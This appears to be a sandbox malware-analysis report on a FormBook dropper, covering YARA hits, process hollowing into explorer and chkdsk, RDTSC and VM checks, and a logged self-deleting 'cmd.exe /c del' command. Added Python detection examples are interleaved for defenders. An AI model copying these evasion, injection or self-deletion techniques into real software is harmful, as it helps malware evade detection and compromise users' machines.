          Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine, Classification label: mal100.troj.evad.winEXE@7/3@14/7
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 2_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 2_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4972:120:WilError_01
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, File created: C:\Users\user\AppData\Local\Temp\nsuBF4A.tmp
          Source: RFQ-BCM 03122020.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: RFQ-BCM 03122020.exeVirustotal: Detection: 20%
          Source: RFQ-BCM 03122020.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeFile read: C:\Users\user\Desktop\RFQ-BCM 03122020.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ-BCM 03122020.exe 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess created: C:\Users\user\Desktop\RFQ-BCM 03122020.exe 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess created: C:\Users\user\Desktop\RFQ-BCM 03122020.exe 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
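The process chain in the rows above is the part of this report an endpoint rule can key on: the dropper starts a second copy of itself (the hollowed instance that carries the FormBook payload), explorer.exe then starts an argument-less chkdsk.exe from SysWOW64, and that chkdsk.exe runs cmd.exe /c del against the original file. One caveat before relying on parent/child alone: explorer.exe is the parent of chkdsk.exe here only because the payload was injected into it (see the memory-mapping signatures in the summary), so the true origin is the dropper, not the shell. The detection below is an added example, not part of the report and not Joe Sandbox's own rule logic; the ProcEvent records, PIDs and the benign control event are constructed for illustration.

```python
"""Detection rules for the dropper -> self -> explorer.exe -> chkdsk.exe -> cmd.exe /c del
chain, run over constructed process-creation records (added example, not sandbox output)."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


SAMPLE = r"C:\Users\user\Desktop\RFQ-BCM 03122020.exe"

# Constructed records modelled on the chain in the report; PIDs are invented.
EVENTS = [
    ProcEvent(1000, 900,  SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(1001, 1000, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(1200, 800,  r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1300, 1200, r"C:\Windows\SysWOW64\chkdsk.exe", r"C:\Windows\SysWOW64\chkdsk.exe"),
    ProcEvent(1301, 1300, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{SAMPLE}'"),
    ProcEvent(1302, 1301, r"C:\Windows\System32\conhost.exe", "conhost.exe 0xffffffff -ForceV1"),
    # benign control: a user opening a file with a WOW64 tool from explorer (has arguments)
    ProcEvent(1400, 1200, r"C:\Windows\SysWOW64\notepad.exe", r"notepad.exe C:\Users\user\a.txt"),
]

DEL_RE = re.compile(r"/c\s+del\s+['\"]?(?P<target>[^'\"]+\.exe)", re.IGNORECASE)


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events):
    """Return [(pid, reason)] for events matching one of three rules."""
    by_pid = {e.pid: e for e in events}
    images = {e.image.lower() for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        # Rule 1: a process creating a second instance of its own image; this is how
        # the sample stages the payload (hollowing a copy of itself).
        if parent and parent.image.lower() == e.image.lower():
            findings.append((e.pid, "self-spawn (possible process hollowing)"))
        # Rule 2: explorer.exe starting a SysWOW64 system binary with no arguments,
        # the shape FormBook's migration into a chosen system tool takes in this report.
        if (parent and base(parent.image) == "explorer.exe"
                and "\\syswow64\\" in e.image.lower()
                and e.cmdline.strip().strip("'\"").lower() == e.image.lower()):
            findings.append((e.pid, "explorer.exe -> bare SysWOW64 binary"))
        # Rule 3: cmd.exe /c del whose target is itself a logged process image
        # (the dropper deleting its own file after migrating).
        m = DEL_RE.search(e.cmdline) if base(e.image) == "cmd.exe" else None
        if m and m.group("target").lower() in images:
            findings.append((e.pid, f"self-deletion of {m.group('target')}"))
    return findings
```

Rule 2 is deliberately narrow (bare command line equal to the image path) so that users launching tools with arguments from the shell do not trip it; in production the image allowlist and the parent check should be tuned per estate, and the rules should be correlated with the injection telemetry rather than used alone.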
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: chkdsk.pdbGCTL source: RFQ-BCM 03122020.exe, 00000003.00000002.305148472.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: chkdsk.pdb source: RFQ-BCM 03122020.exe, 00000003.00000002.305148472.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ-BCM 03122020.exe, 00000002.00000003.250609113.00000000098A0000.00000004.00000001.sdmp, RFQ-BCM 03122020.exe, 00000003.00000002.305161536.0000000000B50000.00000040.00000001.sdmp, chkdsk.exe, 0000000D.00000002.518417672.0000000004B60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ-BCM 03122020.exe, chkdsk.exe

          Data Obfuscation:

Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeUnpacked PE file: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
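The row above compares two section layouts: the five-section image (.text, .rdata, .data, .ndata, .rsrc) of the file on disk against the image found at 0x400000 in the second process, which carries only a .text section. The .ndata section name, together with the nsu*.tmp\System.dll drop further down, is consistent with an NSIS-built installer as the outer layer, with the FormBook payload being written over it in memory. The following is an added example of how such a comparison is made, not the report's or Joe Sandbox's own code: it parses IMAGE_SECTION_HEADER entries from a raw section table and diffs the memory-protection flags of two images. The E/R/W notation, the flag values and the hypothetical in-memory table are constructed for illustration and do not reproduce the sample's actual headers.

```python
"""Parse PE section headers and diff their memory rights between two images
(added example; the section tables below are constructed, not dumped from the sample)."""
import struct

IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000
SECTION_HEADER = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER layout, 40 bytes


def make_section(name: str, characteristics: int, vaddr: int, size: int = 0x1000) -> bytes:
    """Build one IMAGE_SECTION_HEADER (constructed data for the example)."""
    return struct.pack(SECTION_HEADER, name.encode().ljust(8, b"\0"),
                       size, vaddr, size, vaddr, 0, 0, 0, 0, characteristics)


def parse_sections(table: bytes, count: int):
    """Return [(name, Characteristics)] from a raw section table of `count` entries."""
    return [
        (n.rstrip(b"\0").decode("ascii", "replace"), chars)
        for n, *_, chars in (struct.unpack_from(SECTION_HEADER, table, i * 40)
                             for i in range(count))
    ]


def rights(chars: int) -> str:
    """E/R/W letters derived from the IMAGE_SCN_MEM_* flags (own notation, not Joe Sandbox's)."""
    return "".join(letter for letter, flag in (("E", IMAGE_SCN_MEM_EXECUTE),
                                               ("R", IMAGE_SCN_MEM_READ),
                                               ("W", IMAGE_SCN_MEM_WRITE)) if chars & flag)


def describe(sections) -> str:
    return ";".join(f"{name}:{rights(chars)}" for name, chars in sections)


def diff_rights(on_disk, in_memory):
    """Sections whose rights differ, appeared, or vanished: {name: (disk, memory)}."""
    d = {name: rights(chars) for name, chars in on_disk}
    m = {name: rights(chars) for name, chars in in_memory}
    return {name: (d.get(name), m.get(name))
            for name in d.keys() | m.keys() if d.get(name) != m.get(name)}


# On-disk layout with the same section names as the sample; flag values are constructed.
DISK = b"".join([
    make_section(".text",  IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, 0x1000),
    make_section(".rdata", IMAGE_SCN_MEM_READ, 0x2000),
    make_section(".data",  IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, 0x3000),
    make_section(".ndata", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, 0x4000),
    make_section(".rsrc",  IMAGE_SCN_MEM_READ, 0x5000),
])
# Hypothetical header read back from memory after an unpacker ran: .text is now
# writable and the installer-only .ndata section is gone.
MEM = b"".join([
    make_section(".text",  IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE
                 | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, 0x1000),
    make_section(".rdata", IMAGE_SCN_MEM_READ, 0x2000),
    make_section(".data",  IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, 0x3000),
    make_section(".rsrc",  IMAGE_SCN_MEM_READ, 0x5000),
])


def compare_sample():
    """Diff the two constructed tables; a non-empty result is the 'section rights changed' signal."""
    return diff_rights(parse_sections(DISK, 5), parse_sections(MEM, 4))
```

A writable .text or a vanished/added section between the disk header and the in-memory header is a strong unpacking indicator, but the check needs the header read from the process (the loader honours the on-disk flags, so a legitimately loaded image diffs clean); a packer that rewrites the headers after unpacking will hide from this comparison and must be caught via the page protections instead.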
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_73432F60 push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004160DB push ebx; iretd
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004161D5 push esp; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041BB43 push dword ptr [353B5DC7h]; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041C339 push esi; retf
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00415EE1 push cs; iretd
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BCD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_004160DB push ebx; iretd
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_004161D5 push esp; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041BB43 push dword ptr [353B5DC7h]; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041C339 push esi; retf
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_1_00415EE1 push cs; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_001360DB push ebx; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_001361D5 push esp; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013C339 push esi; retf
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013B402 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013B40B push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013B46C push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_0013BE38 push dword ptr [353B5DC7h]; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_00135EE1 push cs; iretd
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeFile created: C:\Users\user\AppData\Local\Temp\nsuBF4B.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000001285E4 second address: 00000000001285EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 000000000012897E second address: 0000000000128984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 1112Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1004Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00405CD8 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.274241173.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.263827938.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.273883653.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.289137714.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.287405384.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.274720309.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.296397511.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.273883653.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.273883653.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.274720309.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000004.00000000.273883653.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,
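The RDTSC rows above show the timing idiom byte for byte: rdtsc, xor ecx,ecx, add ecx,eax, rdtsc, with the second rdtsc six bytes after the first (0x4085E4 to 0x4085EA), and the same code at the same image-relative offsets inside chkdsk.exe after migration. The fs:[00000030h] reads listed in the rows that follow are PEB pointer loads, the usual prelude to reading BeingDebugged or walking the loader list. A caveat when counting those: the 3_2_00Bxxxxx and 3_2_00Cxxxxx addresses fall in the region at 0xB50000 that the pdb strings above attribute to a mapped copy of ntdll (wntdll.pdb), so most of those PEB accesses are likely ntdll's own code rather than the payload's, and a scan for this idiom should be restricted to the unpacked payload image. The scanner below is an added example, not the report's or any vendor's code; the code blob it is run against is constructed to contain the idioms and is not bytes from the sample.

```python
"""Scan a 32-bit code blob for the anti-analysis idioms in this report: paired rdtsc
timing checks and fs:[30h] PEB reads (added example; CODE below is constructed)."""
import re

PATTERNS = {
    # rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc -- the exact sequence the report shows,
    # accepting either encoding of xor/add
    "rdtsc-delta": re.compile(rb"\x0f\x31(?:\x33\xc9|\x31\xc9)(?:\x03\xc8|\x01\xc1)\x0f\x31"),
    # looser: two rdtsc within 16 bytes, catching variants with other arithmetic between
    "rdtsc-pair":  re.compile(rb"\x0f\x31.{0,14}?\x0f\x31", re.DOTALL),
    # mov eax, fs:[30h] (64 A1 disp32) or mov r32, fs:[30h] (64 8B /r disp32)
    "peb-read":    re.compile(rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00"),
}

# Constructed blob: a prologue, the report's rdtsc idiom, a PEB->Ldr load and a
# BeingDebugged read.  Offsets are what the scanner is expected to report.
CODE = (
    b"\x55\x8b\xec"                         # 0:  push ebp ; mov ebp, esp
    b"\x0f\x31\x33\xc9\x03\xc8\x0f\x31"     # 3:  rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc
    b"\x90\x90"                             # 11: nop ; nop
    b"\x64\xa1\x30\x00\x00\x00"             # 13: mov eax, fs:[30h]
    b"\x8b\x40\x0c"                         # 19: mov eax, [eax+0Ch]   (PEB->Ldr)
    b"\x64\x8b\x0d\x30\x00\x00\x00"         # 22: mov ecx, fs:[30h]
    b"\x0f\xb6\x41\x02"                     # 29: movzx eax, byte [ecx+2] (BeingDebugged)
    b"\xc3"                                 # 33: ret
)


def scan(code: bytes):
    """Return sorted [(offset, pattern_name)] for every idiom occurrence in `code`."""
    hits = []
    for name, rx in PATTERNS.items():
        for m in rx.finditer(code):
            hits.append((m.start(), name))
    return sorted(hits)


def summarize(code: bytes, base: int = 0):
    """Counts per idiom plus the virtual addresses of hits, given the image base."""
    hits = scan(code)
    counts = {}
    for _, name in hits:
        counts[name] = counts.get(name, 0) + 1
    return counts, [(hex(base + off), name) for off, name in hits]
```

Run summarize() over the dumped payload section with its load address as base to get addresses comparable with the report's; scanning a whole process including the mapped ntdll copy will produce hundreds of peb-read hits that say nothing about the payload, and a single rdtsc-pair hit in a compiler runtime is normal, so treat the tight rdtsc-delta match plus a PEB read inside the payload's own code as the signal.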
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
